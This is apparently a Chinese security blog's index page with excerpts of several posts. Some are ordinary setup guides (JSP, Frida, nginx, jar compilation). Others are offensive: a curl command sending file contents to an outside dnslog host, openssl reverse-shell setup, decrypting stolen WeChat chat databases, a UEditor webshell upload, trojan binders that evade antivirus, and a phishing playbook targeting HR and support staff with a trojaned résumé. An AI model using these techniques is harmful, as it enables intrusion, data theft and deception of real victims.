Hyyrent blog

dnslog获取完整请求大多数dnslog平台外带数据会发现不能获取全部内容 https://log.xn--9tr.com/ 改用以下地址，但是中文会出现乱码 https://www.log.d48e48337471993e.com/ 或者使用burp自带的dnslog，但是流量告警十分明显 写入文件读取内容1ls -l > aaa.txt; curl -d @aaa.txt http://dnslog地址 实战利用判断是否出网 出网的情况存在HTTP请求出网的情况可以尝试反弹shell https://weibell.github.io/reverse-shell-generator/# 如果被流量设备拦截，可以尝试改用openssl反弹shell VPS上运行 123openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes一直输入回车生成即可openssl s_server -quiet -key key.pem -cert cert.pem -por ...

微信聊天记录提取https://github.com/AdminTest0/SharpWxDump 版本 < 3.7.0.30 只运行不登录能获取个人信息，登录后可以获取数据库密钥 版本 > 3.7.0.30 只运行不登录不能获取个人信息，登录后都能获取 利用前提：新版本微信需要处于登录状态 项目需要使用x86进行编译 运行程序后会生成wechatkey，之后解密可以用上 到此目录下载DB文件，拖到本地进行解密 1C:\Users\用户名\Documents\WeChat Files\wxid_xxxxxxx\Msg\Multi 解密脚本 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849from Crypto.Cipher import AESimport hashlib, hmac, ctypes, sys, getoptSQLITE_FILE_HEADER = bytes('SQLite format 3', ...

DLL劫持DLL简介 在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件，一个DLL文件也可能被不同的应用程序使用，这样的DLL文件被称为共享DLL文件。 DLL加载顺序如果程序需要加载一个相对路径的dll文件，它将从当前目录下尝试查找，如果找不到，则按照如下顺序寻找： windows xp sp2之前Windows查找DLL的目录以及对应的顺序： 进程对应的应用程序所在目录； 当前目录（Current Directory）； 系统目录（通过 GetSystemDirectory 获取）； 16位系统目录； Windows目录（通过 GetWindowsDirectory 获取）； PATH环境变量中的各个目录； windows xp sp2之后Windows查找DLL的目录以及对应的顺序（SafeDllSearchMode 默认会被开启）： 默认注册表为：HKEY_LOCAL_MACHINE\System\C ...

Ueditor漏洞捡漏到github上下载 https://github.com/fex-team/ueditor 下载完成后把压缩包解压后重命名为ueditor，新建一个目录，把 ueditor 放到 test 文件夹下 把net目录转化为应用程序 运行过程报错 修改 web.config，添加 <customErrors mode="Off"/> 修改完成后继续出现报错 在C:\windows\temp这个文件夹添加network service用户的权限即可解决 搭建完成 访问首页，会出现如图403的页面 常规的目录扫描 访问login.html为简单的登陆页面，这个点是用来混淆视线的，直接跳过 但我们可以看到目录扫描ueditor下存在以下页面，可以联想到ueditor getshell 1/ueditor/net/controller.ashx?action= 准备一个aspx木马，重命名为png，并放置到VPS上，在该目录下开启http服务 1python -m SimpleHTTPServer 8080 构造上 ...

免杀木马捆绑器分享在实战钓鱼过程中，常常需要把木马伪装成正常的文件，如果文件运行之后没有任何反应，会引起对方的怀疑 这时候就需要木马捆绑器，释放准备的正常文件，降低对方的戒心，下面列举两种简单的方法： https://github.com/H4de5-7/Bundler-bypassvisual studio打开项目，资源文件选择导入 导入木马和需要释放的文件 编译生成 运行释放，bypass360 https://github.com/Yihsiwei/GoFileBinder坑点： 1、命令里exe要放在释放文件前面，不能更换命令顺序，否则生成后无法正常释放 2、go的版本选择的是17，测试发现18版本会生成失败 1GoFileBinder.exe 木马.exe xxx.txt

JavaServerPages学习环境搭建打开idea，创建一个新项目 12345选择 “Maven” jdk1.8组件选择:org.apache.maven.archetypes 下的 maven-archetype-webapp 项目创建后等待资源加载，第一次时间较久 出现下图表示加载成功 配置编译路径和artifact快捷键 ctrl+alt+shift+s 配置tomcat服务器到 http://tomcat.apache.org 下载对应的版本 在web项目中导入tomcat，点击 idea 右上角的 add configuration 选择 other–tomcatserver–local 配置端口，这里避免端口冲突换成8081，上下保持一致即可 导入tomcat包 fix 添加 war 最终效果 无报错启动成功 访问 http://127.0.0.1:8081/maventest/index.jsp JSP Servlet实例 作用：Servlet定义是容器端小程序，用于直接处理后端业务逻辑 选择 webapp 右键标 ...

如何编译适配java版本的jar包在日常浏览github社区的过程中，会碰到一些好用的java项目，但作者往往只提供源码或与本地jdk不适配的jar包，这时候可以自行进行编译 打开项目 build 往往会出现以下报错信息： 1java: 错误: 不支持发行版本 17 files—>settings ctrl+alt+shift+s project选择对应版本 新建一个maven项目 依次运行clean、compile、package、install 这样可以成果编译出来，但是运行jar包会提示没有主清单属性 这时候可以选择另一种编译方法 Artifacts ——–> JAR ——–> From module with depenencies 然后选择主类（程序入口） 重新选择 build artifact 这时候会在项目目录里生成一个out目录，jar包就在里面 成功编译，并能正常运行 我的博客即将同步至腾讯云开发者社区，邀请大家一同入驻：https://cloud.tencent.com/developer/support-plan?inv ...

frida hook环境搭建安装模块 安装frida模块和frida-tools模块 12python -m pip install fridapython -m pip install frida-tools 安装adb https://developer.android.com/studio/releases/platform-tools 添加adb至path环境变量中，cmd窗口输入 adb 检查是否成功 模拟器配置这里用的是夜神模拟器，选择 关于平板电脑，连续点击 版本号 进入开发者模式 开发者选项开启USB调试 找到 Nox\bin\BignoxVMS\nox 目录下的 nox.vbox 文件 搜索 guestport="5555"，找到所在行的hostip和hostport，就是 adb 连接需要的 ip 和 port adb连接12adb connect 127.0.0.1:62001adb devices 但此时连接大部分会出现以下报错 原因是两者adb版本不匹配所导致 更换nox_adb.exe与adb.exe一致，重启模拟 ...

nginx反向代理nginx基本用法1234nginx 启动nginx -s reload 重新载入配置文件nginx -s reopen 重启nginxnginx -s stop 停止nginx nginx安装123456789101112131415161718mkdir nginxcd nginxwget http://downloads.sourceforge.net/project/pcre/pcre/8.37/pcre-8.37.tar.gztar -xzpvf pcre-8.37.tar.gzcd pcre-8.37./configuremake && make installpcre-config --versionyum -y install make zlib zlib-devel gcc-c++ libtool openssl openssl-develcd ..wget http://nginx.org/download/nginx-1.20.1.tar.gztar -zxvf nginx-1.20.1.tar.gz./configuremak ...

从钓鱼上线到内网漫游钓鱼邮箱搜集在线平台搜集，推荐两个好用的平台 https://app.snov.io/ http://www.skymem.info/ 社工钓鱼一般钓鱼对象选取安全意识比较薄弱的岗位，如客服、招聘HR，在互联网或招聘app上可以搜集到 这次方式是制作简历捆绑马，需要准备cs免杀马一枚和一份虚假简历，钓鱼关键是话术 聊天一上来就发个文件，任谁都有警惕性，先加上聊熟了再去发送文件，建立良好关系是第一步，这和谈恋爱是一样的，目的性不能太强 然后就是钓鱼平时先养好微信小号，定期更新朋友圈，这样才显得真实 图标提取 https://github.com/JarlPenguin/BeCyIconGrabberPortable 图标替换 https://github.com/guitarfreak/SetIcon 邮件钓鱼1、个人邮箱（126邮箱、qq邮箱） 优点：注册快捷简单，即开即用 缺点：邮件发送次数限制，敏感关键字屏蔽，极大几率邮件被退信 2、腾讯企业邮 优点：单次发送数量多，邮件不易被邮件服务器拦截 缺点：需要配置，耗费一定的时间 腾讯企业邮搭建我搭建使用 ...